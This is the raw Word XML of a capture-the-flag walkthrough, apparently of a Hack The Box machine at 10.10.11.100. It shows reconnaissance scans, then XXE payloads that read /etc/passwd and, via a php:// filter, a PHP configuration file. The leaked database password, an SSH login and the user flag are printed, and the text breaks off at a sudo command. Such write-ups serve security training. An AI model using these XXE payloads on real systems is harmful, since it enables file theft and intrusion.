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7967" w:rsidRDefault="0063639D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5579110" cy="3133725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="1" name="Picture 1" descr="https://miro.medium.com/max/1172/1*pCLXqL4R-MTb8a3oIy-8q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max/1172/1*pCLXqL4R-MTb8a3oIy-8qA.jpe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1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39D" w:rsidRDefault="0063639D"/>
    <w:p w:rsidR="00BD64A4" w:rsidRDefault="00BD64A4" w:rsidP="00BD64A4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63639D" w:rsidRDefault="00BD64A4" w:rsidP="00BD64A4">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 10.10.11.100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD64A4" w:rsidRDefault="00D776CF" w:rsidP="00BD64A4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="728785BF" wp14:editId="381F539C">
            <wp:extent cx="5943600" cy="2203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6CF" w:rsidRDefault="00D776CF" w:rsidP="00BD64A4"/>
    <w:p w:rsidR="00476528" w:rsidRDefault="00476528" w:rsidP="00476528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D776CF" w:rsidRDefault="00476528" w:rsidP="00476528">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00220B5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.11.100/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00476528" w:rsidRDefault="00426029" w:rsidP="00476528">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2910E446" wp14:editId="320F0513">
            <wp:extent cx="4448175" cy="3838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29" w:rsidRDefault="00426029" w:rsidP="00476528"/>
    <w:p w:rsidR="00C7424F" w:rsidRDefault="00C7424F" w:rsidP="00476528">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00220B5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.11.100/resources/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C7424F" w:rsidRDefault="002C313E" w:rsidP="00476528">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="306231D9" wp14:editId="40FDB59B">
            <wp:extent cx="5600700" cy="550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313E" w:rsidRDefault="00AE4BB4" w:rsidP="00476528">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00220B5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.11.100/resources/README.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AE4BB4" w:rsidRDefault="00FF4412" w:rsidP="00476528">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68151834" wp14:editId="1A337AEE">
            <wp:extent cx="5943600" cy="20999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BC6" w:rsidRDefault="00CD6BC6" w:rsidP="00CD6BC6">
      <w:r>
        <w:lastRenderedPageBreak/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F4412" w:rsidRDefault="00CD6BC6" w:rsidP="00CD6BC6">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> http://10.10.11.100/ -X .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CD6BC6" w:rsidRDefault="00C77701" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CD4587D" wp14:editId="69A25F32">
            <wp:extent cx="4543425" cy="39433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701" w:rsidRDefault="00C77701" w:rsidP="00CD6BC6"/>
    <w:p w:rsidR="002A2D39" w:rsidRDefault="002A2D39" w:rsidP="00CD6BC6">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00220B5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.11.100/portal.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002A2D39" w:rsidRDefault="009F276F" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6402381E" wp14:editId="51FEB631">
            <wp:extent cx="5943600" cy="64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76F" w:rsidRDefault="00D75705" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C27FD5" wp14:editId="788985A0">
            <wp:extent cx="5943600" cy="1950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05" w:rsidRDefault="00FE7C72" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78A6FD09" wp14:editId="63AF9BF8">
            <wp:extent cx="5943600" cy="18491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C72" w:rsidRDefault="00BE5246" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A8C8C0B" wp14:editId="250EAAE9">
            <wp:extent cx="5943600" cy="15392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826" w:rsidRDefault="00F15826" w:rsidP="00F15826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t>Since it is a hash, you need to decode it first.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15826" w:rsidRDefault="00F15826" w:rsidP="00F15826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t xml:space="preserve">Let’s decode it first as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="D9D6D6"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="D9D6D6"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then as Base64.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5246" w:rsidRDefault="00BE5246" w:rsidP="00CD6BC6"/>
    <w:p w:rsidR="00F15826" w:rsidRDefault="00A82F69" w:rsidP="00CD6BC6">
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00220B5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ostermiller.org/calc/encode.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A82F69" w:rsidRDefault="00D0295C" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B5E7568" wp14:editId="584F7892">
            <wp:extent cx="5943600" cy="37960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95C" w:rsidRDefault="00D0295C" w:rsidP="00CD6BC6"/>
    <w:p w:rsidR="00D0295C" w:rsidRDefault="00397F4A" w:rsidP="00CD6BC6">
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00220B5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/payloadbox/xxe-injection-payload-list</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00397F4A" w:rsidRDefault="00DC5626" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62C7E503" wp14:editId="680F3E7B">
            <wp:extent cx="5943600" cy="24498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626" w:rsidRDefault="00DC5626" w:rsidP="00CD6BC6"/>
    <w:p w:rsidR="00DC5626" w:rsidRDefault="00F013D4" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FAB5976" wp14:editId="31DA04A3">
            <wp:extent cx="5667375" cy="19812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3D4" w:rsidRDefault="00FB648D" w:rsidP="00CD6BC6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Let’s change the payload we find according to ourselves.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB648D" w:rsidRDefault="006C1036" w:rsidP="00CD6BC6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Modified content:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002823A3" w:rsidRDefault="002823A3" w:rsidP="00CD6BC6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&lt;?xml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 xml:space="preserve">  version="1.0" encoding="ISO-8859-1"?&gt;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&lt;!DOCTYPE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 xml:space="preserve"> replace [&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spell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ent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 xml:space="preserve"> SYSTEM "file:///etc/passwd"&gt; ]&gt;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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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bugreport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r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title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&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spell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ent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD5A58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;</w:t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&lt;/title&gt;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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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cwe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test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spell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cwe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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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cvss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test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spell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cvss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</w:p>
    <w:p w:rsidR="002823A3" w:rsidRP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</w:t>
      </w:r>
      <w:proofErr w:type="gram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reward&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gram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test&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002823A3" w:rsidRDefault="002823A3" w:rsidP="002823A3">
      <w:pPr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</w:pP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</w:r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ab/>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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bugreport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002823A3">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="D9D6D6"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1036" w:rsidRDefault="002823A3" w:rsidP="00447C0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24AD860B" wp14:editId="7E8ED978">
            <wp:extent cx="4581525" cy="135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8C9" w:rsidRDefault="00B268C9" w:rsidP="00B268C9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t>And let’s hash again for system recognition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B268C9" w:rsidRDefault="00B268C9" w:rsidP="00B268C9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lastRenderedPageBreak/>
        <w:t xml:space="preserve">First Base64 encode the next </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="D9D6D6"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="007E267A" w:rsidRDefault="007E267A" w:rsidP="006C1036"/>
    <w:p w:rsidR="00B268C9" w:rsidRDefault="00DD5A58" w:rsidP="006C1036">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CD00CCF" wp14:editId="0482426A">
            <wp:extent cx="5943600" cy="504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DD7" w:rsidRDefault="007770CF" w:rsidP="006C1036">
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B85DC0" w:rsidRDefault="00DD5A58" w:rsidP="00CD6BC6">
      <w:r w:rsidRPr="00DD5A58">
        <w:t>PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIHJl%0AcGxhY2UgWzwhRU5USVRZIGVudCBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCI%2BIF0%2BCgkJPGJ1%0AZ3JlcG9ydD4KCQk8dGl0bGU%2BJmVudDs8L3RpdGxlPgoJCTxjd2U%2BdGVzdDwvY3dlPgoJCTxjdnNz%0APnRlc3Q8L2N2c3M%2BCgkJPHJld2FyZD50ZXN0PC9yZXdhcmQ%2BCgkJPC9idWdyZXBvcnQ%2B</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5A58" w:rsidRDefault="00DD5A58" w:rsidP="00CD6BC6"/>
    <w:p w:rsidR="00DD5A58" w:rsidRDefault="00C05AA4" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EAB9699" wp14:editId="081D3D30">
            <wp:extent cx="5943600" cy="28886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AA4" w:rsidRDefault="00C05AA4" w:rsidP="00CD6BC6"/>
    <w:p w:rsidR="00C05AA4" w:rsidRDefault="00731386" w:rsidP="00CD6BC6">
      <w:r>
        <w:t>Username: development</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007302C7" w:rsidRDefault="007302C7" w:rsidP="007302C7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t>Let’s check the contents of the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="D9D6D6"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="D9D6D6"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> document we found earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007302C7" w:rsidRDefault="007302C7" w:rsidP="007302C7">
      <w:pPr>
        <w:pStyle w:val="hj"/>
        <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="D9D6D6"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="D9D6D6"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>To do this, select the appropriate payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731386" w:rsidRDefault="00731386" w:rsidP="00CD6BC6"/>
    <w:p w:rsidR="007302C7" w:rsidRDefault="00E23C57" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15A1EE93" wp14:editId="26A7C94D">
            <wp:extent cx="5943600" cy="10947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7" w:rsidRDefault="00E23C57" w:rsidP="00CD6BC6"/>
    <w:p w:rsidR="001D4D8D" w:rsidRDefault="001D4D8D" w:rsidP="00CD6BC6">
      <w:r>
        <w:t>Modified content:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D4D8D" w:rsidRDefault="001D4D8D" w:rsidP="001D4D8D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&lt;?xml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  version="1.0" encoding="ISO-8859-1"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D4D8D" w:rsidRDefault="001D4D8D" w:rsidP="001D4D8D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&lt;!DOCTYPE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> foo [&lt;!ENTITY ac SYSTEM "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>://filter/read=convert.base64-encode/resource=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"&gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D4D8D" w:rsidRDefault="001D4D8D" w:rsidP="001D4D8D">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>bugreport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D4D8D" w:rsidRDefault="001D4D8D" w:rsidP="001D4D8D">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;&amp;ac;&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D4D8D" w:rsidRDefault="001D4D8D" w:rsidP="001D4D8D">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D4D8D" w:rsidRDefault="001D4D8D" w:rsidP="001D4D8D">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D4D8D" w:rsidRDefault="001D4D8D" w:rsidP="001D4D8D">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>reward&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>test&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D4D8D" w:rsidRDefault="001D4D8D" w:rsidP="001D4D8D">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bugreport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D4D8D" w:rsidRDefault="001D4D8D" w:rsidP="001D4D8D"/>
    <w:p w:rsidR="00896D33" w:rsidRDefault="00896D33" w:rsidP="001D4D8D">
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896D33" w:rsidRDefault="00896D33" w:rsidP="001D4D8D">
      <w:r w:rsidRPr="00896D33">
        <w:t>PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZv%0AbyBbPCFFTlRJVFkgYWMgU1lTVEVNICJwaHA6Ly9maWx0ZXIvcmVhZD1jb252ZXJ0LmJhc2U2NC1l%0AbmNvZGUvcmVzb3VyY2U9ZGIucGhwIj5dPgoJCTxidWdyZXBvcnQ%2BCgkJPHRpdGxlPiZhYzs8L3Rp%0AdGxlPgoJCTxjd2U%2BdGVzdDwvY3dlPgoJCTxjdnNzPnRlc3Q8L2N2c3M%2BCgkJPHJld2FyZD50ZXN0%0APC9yZXdhcmQ%2BCgkJPC9idWdyZXBvcnQ%2B</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896D33" w:rsidRDefault="00982ED0" w:rsidP="001D4D8D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37AA6395" wp14:editId="57483EA5">
            <wp:extent cx="5943600" cy="924674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4326" cy="9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ED0" w:rsidRDefault="003A667E" w:rsidP="001D4D8D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B74A897" wp14:editId="4D8FFF1B">
            <wp:extent cx="5943600" cy="271653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67E" w:rsidRDefault="003A667E" w:rsidP="001D4D8D"/>
    <w:p w:rsidR="008A2E8D" w:rsidRDefault="005B3C07" w:rsidP="00CD6BC6">
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3C07" w:rsidRDefault="005B3C07" w:rsidP="00CD6BC6">
      <w:r w:rsidRPr="005B3C07">
        <w:t>PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000033E8" w:rsidRDefault="000033E8" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FEA5032" wp14:editId="2C563337">
            <wp:extent cx="5943600" cy="147193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9CB" w:rsidRDefault="000119CB" w:rsidP="000119CB">
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbusername</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "admin";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000033E8" w:rsidRDefault="000119CB" w:rsidP="000119CB">
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "m19RoAU0hP41A1sTsq6K";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000119CB" w:rsidRDefault="000119CB" w:rsidP="000119CB"/>
    <w:p w:rsidR="00F53A0F" w:rsidRDefault="00F53A0F" w:rsidP="00F53A0F">
      <w:r>
        <w:t>┌─</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>─(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>💀</w:t>
      </w:r>
      <w:r>
        <w:t>kali)-[/home/kali/Downloads]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53A0F" w:rsidRDefault="00F53A0F" w:rsidP="00F53A0F">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00220B5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>development@10.10.11.100</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F53A0F" w:rsidRDefault="008B13FD" w:rsidP="00F53A0F">
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r>
        <w:t>m19RoAU0hP41A1sTsq6K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B13FD" w:rsidRDefault="00EC6921" w:rsidP="00F53A0F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DE4BABF" wp14:editId="072DF3BC">
            <wp:extent cx="5943600" cy="3522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921" w:rsidRDefault="008435BE" w:rsidP="00F53A0F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1750532B" wp14:editId="421F1568">
            <wp:extent cx="5724525" cy="13239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5BE" w:rsidRDefault="00EE2A5C" w:rsidP="00F53A0F">
      <w:r>
        <w:t xml:space="preserve">User.txt: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2A5C">
        <w:t>20951093cbce6ee2da83347e5b1f02a7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2A5C" w:rsidRDefault="00EE2A5C" w:rsidP="00F53A0F"/>
    <w:p w:rsidR="005B3C07" w:rsidRDefault="00546651" w:rsidP="00CD6BC6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00546651">
        <w:t>development@bountyhunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00546651">
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00546651">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00546651">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
